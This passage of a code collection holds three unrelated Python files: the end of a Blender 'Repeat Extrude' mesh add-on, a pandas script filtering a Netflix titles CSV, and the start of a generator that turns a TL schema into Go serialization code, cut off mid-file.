    random variation on every repetition."""
    bl_idname = 'object.repeatextrude'
    bl_label = 'Repeat Extrude'
    bl_description = 'Repeat Extrude'
    bl_options = {'REGISTER', 'UNDO'}
    # Base rotation (degrees) applied at every repetition.
    rotx = FloatProperty(name='Rot X', min=-85, soft_min=-30, \
        soft_max=30, max=85, default=0, description='X rotation')
    roty = FloatProperty(name='Rot Y', min=-85, soft_min=-30, \
        soft_max=30, max=85, default=0, description='Y rotation')
    rotz = FloatProperty(name='Rot Z', min=-85, soft_min=-30, \
        soft_max=30, max=85, default=-0, description='Z rotation')
    # When enabled, the single combined_scale group drives all three axes.
    combined_scale_option = BoolProperty(name='Combined scale?')
    combined_scale = bpy.props.PointerProperty(type=ScaleProperties)
    x_offset = bpy.props.PointerProperty(type=OffsetProperties)
    y_offset = bpy.props.PointerProperty(type=OffsetProperties)
    z_offset = bpy.props.PointerProperty(type=OffsetProperties)
    x_scale = bpy.props.PointerProperty(type=ScaleProperties)
    y_scale = bpy.props.PointerProperty(type=ScaleProperties)
    z_scale = bpy.props.PointerProperty(type=ScaleProperties)
    # Random-variation amplitudes (used as gauss sigma = value / 3).
    var1 = FloatProperty(name='Offset Var', min=-5, soft_min=-1, \
        soft_max=1, max=5, default=0, description='Offset variation')
    var2 = FloatProperty(name='Rotation Var', min=-5, soft_min=-1, \
        soft_max=1, max=5, default=0, description='Rotation variation')
    scale_variance = FloatProperty(name='Scale Noise', min=-5, soft_min=-1, \
        soft_max=1, max=5, default=0, description='Scaling noise')
    repetitions = IntProperty(name='Repeat', min=1, max=50, soft_max=100, \
        default=5, description='Repetitions')
    seed = IntProperty(name='Seed', min=-9999, max=9999, default=0, \
        description='Seed to feed random values')
    @classmethod
    def poll(cls, context):
        # Only available when the active object is a mesh.
        obj = context.object
        return (obj and obj.type == 'MESH')
    def draw(self, context):
        """Lay out the operator's redo panel."""
        layout = self.layout
        column = layout.column(align=True)
        column.label(text='Transformations:')
        column.prop(self, 'rotx', slider=True)
        column.prop(self, 'roty', slider=True)
        column.prop(self, 'rotz', slider=True)
        self.x_offset.register_layout(layout, 'X')
        self.y_offset.register_layout(layout, 'Y')
        self.z_offset.register_layout(layout, 'Z')
        layout.prop(self, 'combined_scale_option')
        # Either one combined scale group or three per-axis groups.
        if (self.combined_scale_option):
            self.combined_scale.register_layout(layout, 'Combined')
        else:
            self.x_scale.register_layout(layout, 'X')
            self.y_scale.register_layout(layout, 'Y')
            self.z_scale.register_layout(layout, 'Z')
        column = layout.column(align=True)
        column.label(text='Variation settings:')
        column.prop(self, 'var1', slider=True)
        column.prop(self, 'var2', slider=True)
        column.prop(self, 'scale_variance', slider=True)
        column.prop(self, 'seed')
        column = layout.column(align=False)
        column.prop(self, 'repetitions')
    def execute(self, context):
        """Perform the repeated extrusion on all selected faces."""
        obj = bpy.context.object
        mode = obj.mode
        mw = obj.matrix_world  # NOTE(review): unused below — TODO confirm before removing
        # Switch to face select mode.
        bpy.context.tool_settings.mesh_select_mode = [False, False, True]
        # bmesh operations
        bpy.ops.object.mode_set()
        bm = bmesh.new()
        bm.from_mesh(obj.data)
        selectedFaces = [f for f in bm.faces if f.select]
        # faces loop
        for i, selectedFace in enumerate(selectedFaces):
            # Noise is seeded per source face so results are repeatable.
            rotation = vrotation(self, i)
            location = vlocation(self, i)
            selectedFace.normal_update()
            # extrusion loop
            for repetition in range(self.repetitions):
                newFace = selectedFace.copy()
                newFace.normal_update()
                newFaceNormal = newFace.normal.copy()
                newFaceCenterBounds = newFace.calc_center_bounds()
                if (self.combined_scale_option):
                    # One scale value drives all three axes.
                    xscale = self.combined_scale.calculate_scale(self.repetitions, repetition, self.seed, self.scale_variance)
                    yscale = xscale
                    zscale = xscale
                else:
                    xscale = self.x_scale.calculate_scale(self.repetitions, repetition, self.seed, self.scale_variance)
                    yscale = self.y_scale.calculate_scale(self.repetitions, repetition, self.seed, self.scale_variance)
                    zscale = self.z_scale.calculate_scale(self.repetitions, repetition, self.seed, self.scale_variance)
                for v in newFace.verts:
                    v.co.rotate(rotation)
                    # Push the copied face along its normal.
                    v.co += newFaceNormal * location
                    v.co = v.co.lerp(newFaceCenterBounds, 0)  # NOTE(review): factor 0 makes this a no-op — confirm intent
                    v.co.x += self.x_offset.calculate_offset(self.repetitions, repetition)
                    v.co.y += self.y_offset.calculate_offset(self.repetitions, repetition)
                    v.co.z += self.z_offset.calculate_offset(self.repetitions, repetition)
                bmesh.ops.scale(
                    bm,
                    vec=(xscale, yscale, zscale),
                    verts=newFace.verts
                )
                # extrude code from TrumanBlending
                # Bridge each edge of the old face to the new one with a quad.
                for a, b in zip(selectedFace.loops, newFace.loops):
                    sf = bm.faces.new((a.vert, a.link_loop_next.vert, \
                        b.link_loop_next.vert, b.vert))
                    sf.normal_update()
                bm.faces.remove(selectedFace)
                newFace.select_set(True)
                # Next repetition extrudes from the face just created.
                selectedFace = newFace
        for v in bm.verts: v.select = False
        for e in bm.edges: e.select = False
        bm.to_mesh(obj.data)
        obj.data.update()
        # restore user settings
        bpy.ops.object.mode_set(mode=mode)
        if not len(selectedFaces):
            # Nothing was selected, so nothing was extruded; tell the user.
            self.report({'INFO'}, 'Please select one or more faces.')
        return{'FINISHED'}
class RepeatExtrudeToolButton(bpy.types.Panel):
    """Tool-shelf panel exposing a button that invokes the operator."""
    bl_label = 'Repeat Extrude'
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'TOOLS'
    def draw(self, context):
        layout = self.layout
        layout.operator('object.repeatextrude')
def register():
    """Register the add-on's classes with Blender.

    Order matters: the property groups must exist before the operator that
    holds PointerProperty references to them.
    """
    for cls in (ScaleProperties, OffsetProperties,
                RepeatExtrude, RepeatExtrudeToolButton):
        bpy.utils.register_class(cls)
def unregister():
    """Unregister everything registered in register(), in reverse order.

    Bug fix: the original called bpy.utils.register_class for
    OffsetProperties and ScaleProperties here, which tried to RE-register
    them on disable instead of removing them.
    """
    bpy.utils.unregister_class(RepeatExtrudeToolButton)
    bpy.utils.unregister_class(RepeatExtrude)
    bpy.utils.unregister_class(OffsetProperties)
    bpy.utils.unregister_class(ScaleProperties)
# Allow running the add-on directly from Blender's text editor.
if __name__ == '__main__':
    register()
|
19,294 | f39060cdb929b81a9b1ccbd897b794615125a359 | #!/usr/bin/python3
import pandas as pd
"""
@author Arturo Negreiros
"""
PATH = "practices/netflix_titles.csv"
def duration_filter(duration):
    """Return True when the leading minute count of *duration* (e.g. "90 min")
    is at most 100."""
    minutes, _, _ = duration.partition(" ")
    return int(minutes) <= 100
def main():
    """Print a legend of the dataset's columns/ratings, then list US movies
    rated R that run 100 minutes or less.

    Idiom fix: the column names are taken directly from ``netflix.columns``
    instead of a manual append loop.
    """
    netflix = pd.read_csv(PATH)
    # NOTE(review): headers/rating are computed but never used below —
    # kept for parity with the printed legend; consider removing.
    headers = list(netflix.columns)
    # Order-preserving de-duplication of the rating values (kept as a loop:
    # NaN entries compare unequal to themselves, so set/dict tricks would
    # change the result).
    rating = list()
    for y in netflix['rating']:
        if y not in rating:
            rating.append(y)
    print("""
    The headers:
        'show_id' 'type' 'title' 'director'
        'cast' 'country' 'date_added' 'release_year'
        'rating' 'duration' 'listed_in' 'description'
    Rating or classification about the content:
        NR & UR Not rated or Un rated, generally is
                because, the content of the film
                was not shipped with the classification properly
                and the actual content would be not properly to
                children
        TV-PG Guidance Parental suggested
        TV-Y7 Children Public for 7 years old
        TV-Y Children Public, under 6 years old
        G General Audience
        TV-G General Audience
        PG Parental Guidance Suggested
        PG-13 Parents Strongly Cautioned
        R Restricted
        NC-17 Adults Only
        TV-MA Olders than 17
        TV-14 Olders than 14 Parental Guidance Suggested
        TV-Y7-FV Chill audience with fiction violence and strong emotions
    Type:
        Tv-Show or Movie
    """)
    print("""
    Setting some filters about the rating for olders than 17 years old
    generating filters for the country => United States
    Type movie""")
    # US movies, rated R, at most 100 minutes long.
    print(netflix[
        (netflix['country'] == 'United States') & (netflix['type'] == 'Movie') & (netflix['rating'] == 'R') & (
            netflix['duration'].apply(lambda x: duration_filter(x)))][['title', 'rating', 'duration']])
def review_data():
    """Print US titles whose name contains the standalone word "murder",
    showing title, release_year and rating with release_year as a number.

    Bug fix: the numeric conversion was assigned to a NEW misspelled column
    'relase_year' instead of replacing 'release_year'.
    """
    netflix = pd.read_csv(PATH)
    # sns.pilot(netflix, hue="type")
    # plt.show()
    # print(netflix)

    def filter_viewing_data(title):
        # Whole-word match: split on spaces so "murderer" does not match.
        return "murder" in title.lower().split(" ")

    data_frame = netflix[
        netflix['title'].apply(filter_viewing_data)
        & (netflix['country'] == 'United States')
    ][['title', 'release_year', 'rating']]
    data_frame['release_year'] = pd.to_numeric(data_frame['release_year'])
    print(data_frame)  # printing the data by country and the murder word in the title
def filtering_by_duration():
    """Print title/description of United-States titles whose duration is
    exactly 100 minutes."""
    catalogue = pd.read_csv("practices/netflix_titles.csv")

    def is_exactly_100_minutes(duration):
        # Duration strings look like "100 min"; compare the leading number.
        return int(duration.split(" ")[0]) == 100

    def is_united_states(country):
        return country == "United States"

    mask = (catalogue['country'].apply(is_united_states)
            & catalogue['duration'].apply(is_exactly_100_minutes))
    print(catalogue[mask][['title', 'description']])
# Entry point: only the duration-based filter demo is currently enabled.
if __name__ == '__main__':
    # main()
    # review_data()
    filtering_by_duration()
|
19,295 | 1f617ff65f1f239f07b8ebbe33d0216eb586ad27 | #!/usr/bin/python
#-*- coding: utf-8 -*-
#encoding=utf-8
'''
/*
* Copyright (c) 2017, https://github.com/nebula-im/nebula
* All rights reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
// 最后一步,flags检查
'''
import glob, re, binascii, os, sys
def txt_wrap_by(start_str, end, line):
    """Return the stripped text in *line* between *start_str* and *end*,
    or None when either delimiter is missing."""
    begin = line.find(start_str)
    if begin < 0:
        return None
    begin += len(start_str)
    stop = line.find(end, begin)
    if stop < 0:
        return None
    return line[begin:stop].strip()
# Minimal hand-rolled CLI parsing: one positional input file plus an output
# path given either as "-o PATH" or fused as "-oPATH".
# NOTE(review): argparse would handle this more robustly — left as-is.
input_file = ''
output_path = ''
next_output_path = False
for arg in sys.argv[1:]:
    if next_output_path:
        # Previous token was "-o": this token is the output path.
        next_output_path = False
        output_path = arg
    elif arg == '-o':
        next_output_path = True
    elif re.match(r'^-o(.+)', arg):
        # Fused form "-oPATH": strip the leading "-o".
        output_path = arg[2:]
    else:
        input_file = arg
if input_file == '':
    print('Input file required.')
    sys.exit(1)
if output_path == '':
    print('Output path required.')
    sys.exit(1)
def to_proto_go_name(name):
    """Convert a TL schema identifier to the Go-style name used in output.

    Each '_'-separated part has its first letter upper-cased; a part after
    the first that already starts with an uppercase letter keeps a leading
    underscore instead. 'udp_p2p' is special-cased to 'UdpP2P'.
    """
    source = 'UdpP2P' if name == 'udp_p2p' else name
    pieces = []
    for idx, part in enumerate(source.split('_')):
        if idx != 0 and part[0:1].isupper():
            pieces.append('_' + part)
        else:
            pieces.append(part[0:1].upper() + part[1:])
    return ''.join(pieces)
# ---- Code-generation state: filled by the parser, consumed by the emitters ----
output_proto = output_path # + '/codec_schema.tl.pb.go'
# this is a map (key flags -> map (flag name -> flag bit))
# each key flag of parentFlags should be a subset of the value flag here
parentFlagsCheck = {};
layer = '';  # becomes 'const CURRENT_LAYER = N' when a '// LAYER N' line is seen
funcs = 0
types = 0;
consts = 0  # number of type constructors parsed
funcsNow = 0  # 1 while inside the ---functions--- section, 0 inside ---types---
enums = [];
funcsDict = {};  # function result type -> list of declaration records
FuncsDict = {};
funcsList = [];
typesDict = {};  # boxed type name -> list of constructor records
TypesDict = {};
typesList = [];
TypesList = [];
typesText = '';
creatorProxyText = '';
inlineMethods = '';
textSerializeInit = '';
textSerializeMethods = '';
classTypesTexts = '';  # accumulated per-constructor Encode/Decode Go source
resClassTypesTexts = '';  # accumulated boxed-type wrapper Go source
resClassTypesTexts2 = '';
resClassTypesTexts3 = '';
classFuncsTexts = '';
registers = [];  # CRC32-constructor -> factory entries; pre-seeded with core types
registers.append(' int32(TLConstructor_CRC32_message2) : func() (TLObject) { return new(TLMessage2) },\n');
registers.append(' int32(TLConstructor_CRC32_msg_container) : func() (TLObject) { return new(TLMsgContainer) },\n');
registers.append(' int32(TLConstructor_CRC32_msg_copy) : func() (TLObject) { return new(TLMsgCopy) },\n');
registers.append(' int32(TLConstructor_CRC32_gzip_packed) : func() (TLObject) { return new(TLGzipPacked) },\n');
registers.append(' int32(TLConstructor_CRC32_rpc_result) : func() (TLObject) { return new(TLRpcResult) },\n');
# ---- Parse the TL schema file: one declaration per line. Validates each
# ---- declared CRC32 against one recomputed from the normalized line, and
# ---- fills funcsDict/typesDict plus the constructor registry.
with open(input_file) as f:
    for line in f:
        line=line.strip('\n')
        layerline = re.match(r'// LAYER (\d+)', line)
        if (layerline):
            # current schema layer
            layer = 'const CURRENT_LAYER = ' + layerline.group(1);
        nocomment = re.match(r'^(.*?)//', line)
        if (nocomment):
            line = nocomment.group(1);
        if (re.match(r'\-\-\-functions\-\-\-', line)):
            funcsNow = 1;
            continue;
        if (re.match(r'\-\-\-types\-\-\-', line)):
            funcsNow = 0;
            continue;
        if (re.match(r'^\s*$', line)):
            continue;
        nametype = re.match(r'([a-zA-Z\.0-9_]+)#([0-9a-f]+)([^=]*)=\s*([a-zA-Z\.<>0-9_]+);', line);
        if (not nametype):
            # special-case: vector#1cb5c415 {t:Type} # [ t ] = Vector t;
            if (not re.match(r'vector#1cb5c415 \{t:Type\} # \[ t \] = Vector t;', line)):
                print('Bad line found: ' + line);
            continue;
        # resPQ#05162463 nonce:int128 server_nonce:int128 pq:string server_public_key_fingerprints:Vector<long> = ResPQ;
        # name is: resPQ
        # contest.saveDeveloperInfo#9a5f6e95 vk_id:int name:string phone_number:string age:int city:string = Bool;
        # name becomes: contest_saveDeveloperInfo
        name = nametype.group(1);
        nameInd = name.find('.');
        if (nameInd >= 0):
            Name = name[0:nameInd] + '_' + name[nameInd + 1:nameInd + 2].upper() + name[nameInd + 2:];
            name = name.replace('.', '_');
        else:
            Name = name[0:1].upper() + name[1:];
        # typeid is: 05162463
        typeid = nametype.group(2);
        # strip leading zeros
        while (len(typeid) > 0 and typeid[0] == '0'):
            typeid = typeid[1:];
        if (len(typeid) == 0):
            typeid = '0';
        typeid = '0x' + typeid;
        cleanline = nametype.group(1) + nametype.group(3) + '= ' + nametype.group(4);
        cleanline = re.sub(r' [a-zA-Z0-9_]+\:flags\.[0-9]+\?true', '', cleanline);
        cleanline = cleanline.replace('<', ' ').replace('>', ' ').replace('  ', ' ');
        cleanline = re.sub(r'^ ', '', cleanline);
        cleanline = re.sub(r' $', '', cleanline);
        cleanline = cleanline.replace(':bytes ', ':string ');
        cleanline = cleanline.replace('?bytes ', '?string ');
        cleanline = cleanline.replace('{', '');
        cleanline = cleanline.replace('}', '');
        # recompute the CRC32 from cleanline and validate the declared typeid
        countTypeId = binascii.crc32(binascii.a2b_qp(cleanline));
        if (countTypeId < 0):
            countTypeId += 2 ** 32;
        countTypeId = '0x' + re.sub(r'^0x|L$', '', hex(countTypeId));
        if (typeid != countTypeId):
            print('Warning: counted ' + countTypeId + ' mismatch with provided ' + typeid + ' (' + cleanline + ')');
            continue;
        typeid = binascii.crc32(binascii.a2b_qp(cleanline));
        # params is: nonce:int128 server_nonce:int128 pq:string server_public_key_fingerprints:Vector<long>
        params = nametype.group(3);
        # restype is: ResPQ
        restype = nametype.group(4);
        if (restype.find('<') >= 0):
            # vector
            templ = re.match(r'^([vV]ector<)([A-Za-z0-9\._]+)>$', restype);
            if (templ):
                vectemplate = templ.group(2);
                if (re.match(r'^[A-Z]', vectemplate) or re.match(r'^[a-zA-Z0-9]+_[A-Z]', vectemplate)):
                    # restype = templ.group(1) + 'MTP' + vectemplate.replace('.', '_') + '>';
                    # restype = 'std::vector<std::shared_ptr<' + vectemplate.replace('.', '_') + '>>';
                    restype = templ.group(1) + vectemplate.replace('.', '_') + '>';
                    # print('name: ' + name + ', object: ' + restype);
                elif (vectemplate == 'int' or vectemplate == 'long' or vectemplate == 'string'):
                    if (vectemplate == 'int'):
                        vectemplate = 'int32_t';
                    elif (vectemplate == 'long'):
                        vectemplate = 'int64_t';
                    else:
                        vectemplate = 'std::string';
                    # restype = templ.group(1) + 'MTP' + vectemplate.replace('.', '_') + '>';
                    # restype = 'std::vector<' + vectemplate.replace('.', '_') + '>';
                    restype = templ.group(1) + vectemplate.replace('.', '_') + '>';
                    # print('name: ' + name + ', int/long/string: ' + restype);
                else:
                    # unknown element type: look for its boxed (meta) type
                    foundmeta = '';
                    for metatype in typesDict:
                        for typedata in typesDict[metatype]:
                            if (typedata[0] == vectemplate):
                                foundmeta = metatype;
                                break;
                        if (len(foundmeta) > 0):
                            break;
                    if (len(foundmeta) > 0):
                        # ptype = templ.group(1) + 'MTP' + foundmeta.replace('.', '_') + '>';
                        ptype = templ.group(1) + foundmeta.replace('.', '_') + '>';
                        # print('name: ' + name + ', foundmeta: ' + ptype);
                    else:
                        print('Bad vector param: ' + vectemplate);
                        continue;
            else:
                print('Bad template type: ' + restype);
                continue;
        resType = restype.replace('.', '_');
        # print('restype: ' + restype + ', resType: ' + resType);
        if (restype.find('.') >= 0):
            parts = re.match(r'([a-z]+)\.([A-Z][A-Za-z0-9<>\._]+)', restype)
            if (parts):
                restype = parts.group(1) + '_' + parts.group(2)[0:1].lower() + parts.group(2)[1:];
            else:
                print('Bad result type name with dot: ' + restype);
                continue;
        else:
            if (re.match(r'^[A-Z]', restype)):
                restype = restype[:1].lower() + restype[1:];
            else:
                print('Bad result type name: ' + restype);
                continue;
        # print('name: %s, typeid: %s, params: %s, resType: %s, restype: %s' %(name, typeid, params, resType, restype));
        # emit the registry entry, e.g.: REGISTER_TLOBJECT(TL_resPQ);
        registers.append(' int32(TLConstructor_CRC32_' + name + ') : func() (TLObject) { return new(TL' + to_proto_go_name(name) + ') },\n');
        # parameter handling
        paramsList = params.strip().split(' ');
        prms = {};
        conditions = {}; # conditional fields: flags:# first_name:flags.0?string last_name:flags.1?string about:flags.2?string
        trivialConditions = {}; # true type, allow_flashcall:flags.0?true
        prmsList = [];
        conditionsList = [];
        isTemplate = hasFlags = hasTemplate = '';
        for param in paramsList:
            if (re.match(r'^\s*$', param)):
                continue;
            templ = re.match(r'^{([A-Za-z]+):Type}$', param); # vector#1cb5c415 {t:Type} # [ t ] = Vector t;
            if (templ):
                hasTemplate = templ.group(1);
                # print('hasTemplate: ' + hasTemplate + ', in: ' + cleanline);
                continue;
            pnametype = re.match(r'([a-z_][a-z0-9_]*):([A-Za-z0-9<>\._]+|![a-zA-Z]+|\#|[a-z_][a-z0-9_]*\.[0-9]+\?[A-Za-z0-9<>\._]+)$', param);
            if (not pnametype):
                print('Bad param found: "' + param + '" in line: ' + line);
                continue;
            pname = pnametype.group(1); # param name
            ptypewide = pnametype.group(2); # param type
            if (re.match(r'^!([a-zA-Z]+)$', ptypewide)):
                if ('!' + hasTemplate == ptypewide):
                    # template type
                    isTemplate = pname;
                    ptype = 'TQueryType';
                    # print('template param name: ' + pname + ', type: TQueryType');
                else:
                    print('Bad template param name: "' + param + '" in line: ' + line);
                    continue;
            elif (ptypewide == '#'):
                # flags: like a protobuf optional-fields bitmask
                hasFlags = pname;
                ptype = 'int32';
            else:
                ptype = ptypewide;
                if (ptype.find('?') >= 0):
                    # flags.0?string
                    pmasktype = re.match(r'([a-z_][a-z0-9_]*)\.([0-9]+)\?([A-Za-z0-9<>\._]+)', ptype);
                    if (not pmasktype or pmasktype.group(1) != hasFlags):
                        print('Bad param found: "' + param + '" in line: ' + line);
                        continue;
                    ptype = pmasktype.group(3);
                    if (ptype.find('<') >= 0):
                        # inputMediaUploadedPhoto#630c9af1 flags:# file:InputFile caption:string stickers:flags.0?Vector<InputDocument> = InputMedia;
                        # print('flags\'s template type: ' + ptype);
                        templ = re.match(r'^([vV]ector<)([A-Za-z0-9\._]+)>$', ptype);
                        if (templ):
                            vectemplate = templ.group(2);
                            if (re.match(r'^[A-Z]', vectemplate) or re.match(r'^[a-zA-Z0-9]+_[A-Z]', vectemplate)):
                                # ptype = templ.group(1) + 'MTP' + vectemplate.replace('.', '_') + '>';
                                # ptype = 'std::vector<std::shared_ptr<' + vectemplate.replace('.', '_') + '>>';
                                ptype = 'TLObjectVector<' + vectemplate.replace('.', '_') + '>';
                            elif (vectemplate == 'int' or vectemplate == 'long' or vectemplate == 'string'):
                                # ptype = templ.group(1) + 'MTP' + vectemplate.replace('.', '_') + '>';
                                if (vectemplate == 'int'):
                                    ptype = 'repeated int32';
                                    # vectemplate = 'int32_t';
                                elif (vectemplate == 'long'):
                                    ptype = 'repeated int64';
                                    # vectemplate = 'int64_t';
                                else:
                                    # BUG FIX: was 'repeated int32 string', which no emitter
                                    # branch matches; use 'repeated string' as in the
                                    # identical non-conditional branch below.
                                    ptype = 'repeated string';
                                    # vectemplate = 'std::string';
                                # ptype = 'std::vector<' + vectemplate.replace('.', '_') + '>';
                            else:
                                foundmeta = '';
                                for metatype in typesDict:
                                    for typedata in typesDict[metatype]:
                                        if (typedata[0] == vectemplate):
                                            foundmeta = metatype;
                                            break;
                                    if (len(foundmeta) > 0):
                                        break;
                                if (len(foundmeta) > 0):
                                    # ptype = templ.group(1) + 'MTP' + foundmeta.replace('.', '_') + '>';
                                    ptype = 'std::vector<' + foundmeta.replace('.', '_') + '>';
                                    print('foundmeta: ' + ptype);
                                else:
                                    print('Bad vector param: ' + vectemplate);
                                    continue;
                        else:
                            print('Bad template type: ' + ptype);
                            continue;
                    if (not pname in conditions):
                        conditionsList.append(pname);
                        conditions[pname] = pmasktype.group(2);
                        # print('condition: ' + pname + ' --> ' + pmasktype.group(2) + ', ' + ptype);
                    if (ptype == 'true'):
                        trivialConditions[pname] = 1;
                elif (ptype.find('<') >= 0):
                    templ = re.match(r'^([vV]ector<)([A-Za-z0-9\._]+)>$', ptype);
                    if (templ):
                        vectemplate = templ.group(2);
                        if (re.match(r'^[A-Z]', vectemplate) or re.match(r'^[a-zA-Z0-9]+_[A-Z]', vectemplate)):
                            # ptype = templ.group(1) + 'MTP' + vectemplate.replace('.', '_') + '>';
                            # ptype = 'std::vector<std::shared_ptr<' + vectemplate.replace('.', '_') + '>>';
                            ptype = 'TLObjectVector<' + vectemplate.replace('.', '_') + '>';
                        elif (vectemplate == 'int' or vectemplate == 'long' or vectemplate == 'string'):
                            # ptype = templ.group(1) + 'MTP' + vectemplate.replace('.', '_') + '>';
                            if (vectemplate == 'int'):
                                ptype = 'repeated int32';
                                # vectemplate = 'int32_t';
                            elif (vectemplate == 'long'):
                                ptype = 'repeated int64';
                                # vectemplate = 'int64_t';
                            else:
                                ptype = 'repeated string';
                                # vectemplate = 'std::string';
                            # ptype = 'std::vector<' + vectemplate.replace('.', '_') + '>';
                        else:
                            foundmeta = '';
                            for metatype in typesDict:
                                for typedata in typesDict[metatype]:
                                    if (typedata[0] == vectemplate):
                                        foundmeta = metatype;
                                        break;
                                if (len(foundmeta) > 0):
                                    break;
                            if (len(foundmeta) > 0):
                                # ptype = templ.group(1) + 'MTP' + foundmeta.replace('.', '_') + '>';
                                ptype = 'std::vector<TL_' + vectemplate + '*>';
                                print('ptype: ' + ptype + ', metatype: ' + metatype + ', vectemplate: ' + vectemplate);
                            else:
                                print('Bad vector param: ' + vectemplate);
                                continue;
                    else:
                        print('Bad template type: ' + ptype);
                        continue;
            prmsList.append(pname);
            # prms[pname] = ptype.replace('.', '_');
            ptype2 = ptype.replace('.', '_');
            if (ptype2 == 'true'):
                ptype2 = 'bool';
            if (ptype2 == 'int'):
                ptype2 = 'int32';
            if (ptype2 == 'long'):
                ptype2 = 'int64';
            if (ptype2 == 'int128'):
                ptype2 = 'int128';
            if (ptype2 == 'int256'):
                ptype2 = 'int256';
            if (ptype2 == 'string'):
                ptype2 = 'string';
            if (ptype2 == 'bytes'):
                ptype2 = 'bytes';
            prms[pname] = ptype2;
        # print(prms);
        if (isTemplate == '' and resType == 'X'):
            print('Bad response type "X" in "' + name +'" in line: ' + line);
            continue;
        if funcsNow:
            if (not restype in funcsDict):
                funcsList.append(restype);
                funcsDict[restype] = [];
                # TypesDict[restype] = resType;
                FuncsDict[restype] = resType;
            funcsDict[restype].append([name, typeid, prmsList, prms, hasFlags, conditionsList, conditions, trivialConditions, line]);
            # print(funcsDict[restype])
        else:
            if (isTemplate != ''):
                print('Template types not allowed: "' + resType + '" in line: ' + line);
                continue;
            if (not restype in typesDict):
                typesList.append(restype);
                TypesList.append(resType);
                # print('typeList added: ' + restype);
                typesDict[restype] = [];
                TypesDict[restype] = resType;
            typesDict[restype].append([name, typeid, prmsList, prms, hasFlags, conditionsList, conditions, trivialConditions, line]);
            consts = consts + 1;
            # print(TypesDict[restype])
# ---- Emit Go source for every boxed type: the boxed wrapper's
# ---- Encode/Decode/Make helpers plus per-constructor Encode/Decode methods.
for restype in typesList:
    v = typesDict[restype];
    resType = TypesDict[restype];
    # print('restype:' + restype + ', resType: ' + resType);
    # the following locals are leftovers from an older emitter and are unused
    withData = 0;
    creatorsText = '';
    constructsText = '';
    constructsInline = '';
    withType = (len(v) > 1);
    switchLines = '';
    friendDecl = '';
    getters = '';
    reader = '';
    writer = '';
    sizeList = [];
    sizeFast = '';
    newFast = '';
    sizeCases = '';
    # print(v)
    resClassTypesTexts2 = ''
    resClassTypesTexts3 = ''
    # boxed wrapper Encode(): dispatch on the oneof payload variant
    resClassTypesTexts += 'func (m *' + to_proto_go_name(resType) + ') Encode() (b []byte) {\n'
    resClassTypesTexts += ' b = nil\n'
    resClassTypesTexts += ' switch m.Payload.(type) {\n';
    # boxed wrapper Decode(): dispatch on the leading constructor id
    resClassTypesTexts2 += 'func (m *' + to_proto_go_name(resType) + ') Decode(dbuf *DecodeBuf) error {\n'
    resClassTypesTexts2 += ' classId := dbuf.Int()\n'
    resClassTypesTexts2 += ' switch classId {\n'
    # Make<T>(): wrap a concrete constructor message into the boxed type
    resClassTypesTexts3 += 'func Make' + to_proto_go_name(resType) + '(message proto.Message) (m *' + to_proto_go_name(resType) + ') {\n'
    resClassTypesTexts3 += ' switch message.(type) {\n'
    #### resClassTypesTexts += ' oneof payload {\n';
    ij = 1;
    for data in v:
        # record layout produced by the parser above
        name = data[0];
        typeid = data[1];
        prmsList = data[2];
        prms = data[3];
        hasFlags = data[4];
        conditionsList = data[5];
        conditions = data[6];
        trivialConditions = data[7];
        line = data[8]
        classTypesTexts += '// ' + line + '\n';
        classTypesTexts += 'func (m* TL' + to_proto_go_name(name) + ') To' + to_proto_go_name(resType) + '() (*' + to_proto_go_name(resType) + ') {\n'
        classTypesTexts += ' return &' + to_proto_go_name(resType) + '{\n';
        classTypesTexts += ' Payload: &' + to_proto_go_name(resType) + '_' + to_proto_go_name(name) + '{\n'
        # classTypesTexts += ' ' + to_proto_go_name(name) + ': &TL' + to_proto_go_name(name) + '{}, \n'
        classTypesTexts += ' ' + to_proto_go_name(name) + ': m, \n'
        classTypesTexts += ' },\n'
        classTypesTexts += ' }\n'
        classTypesTexts += '}\n\n'
        # classTypesTexts += 'message Z' + name + ' : public ' + resType + ' {\n'; # type class declaration
        classTypesTexts += 'func (m* TL' + to_proto_go_name(name) + ') Encode() []byte {\n'; # type class declaration
        classTypesTexts += ' x := NewEncodeBuf(512)\n'; # type class declaration
        classTypesTexts += ' x.Int(int32(TLConstructor_CRC32_' + name + '))\n'
        #### resClassTypesTexts += ' TL_' + name + ' ' + name + ' = ' + str(ij) + ';\n'
        resClassTypesTexts += ' case *' + to_proto_go_name(resType) + '_' + to_proto_go_name(name) +':\n'
        resClassTypesTexts += ' m2, _ := m.Payload.(*' + to_proto_go_name(resType) + '_' + to_proto_go_name(name) + ')\n'
        resClassTypesTexts += ' b = m2.' + to_proto_go_name(name) + '.Encode()\n'
        resClassTypesTexts2 += ' case int32(TLConstructor_CRC32_' + name + '):\n'
        resClassTypesTexts2 += ' m2 := ' + to_proto_go_name(resType) + '_' + to_proto_go_name(name) + '{}\n'
        resClassTypesTexts2 += ' m2.' + to_proto_go_name(name) + ' = &TL' + to_proto_go_name(name) + '{}\n'
        resClassTypesTexts2 += ' m2.' + to_proto_go_name(name) + '.Decode(dbuf)\n'
        resClassTypesTexts2 += ' m.Payload = &m2\n'
        resClassTypesTexts3 += ' case *TL' + to_proto_go_name(name) +':\n'
        resClassTypesTexts3 += ' m2, _ := message.(*TL' + to_proto_go_name(name) + ')\n'
        resClassTypesTexts3 += ' m = &' + to_proto_go_name(resType) + '{\n'
        resClassTypesTexts3 += ' Payload: &' + to_proto_go_name(resType) + '_' + to_proto_go_name(name) + '{\n'
        resClassTypesTexts3 += ' ' + to_proto_go_name(name) + ': m2,\n'
        resClassTypesTexts3 += ' },\n'
        resClassTypesTexts3 += ' }\n'
        ij += 1;
        ii = 1;
        # first pass: compute the flags bitmask from the conditional fields
        if (hasFlags):
            classTypesTexts += '\n var flags uint32 = 0\n';
            ## Encode()
            for paramName in prmsList:
                paramType = prms[paramName];
                if (paramName in conditionsList):
                    if (paramType in ['bool']):
                        # print ' if m.' + to_proto_go_name(paramName) + ' == true {'
                        classTypesTexts += ' if m.' + to_proto_go_name(paramName) + ' == true {\n';
                    elif (paramType in ['int32', 'int64']):
                        #print ' if m.' + to_proto_go_name(paramName) + ' != 0 {'
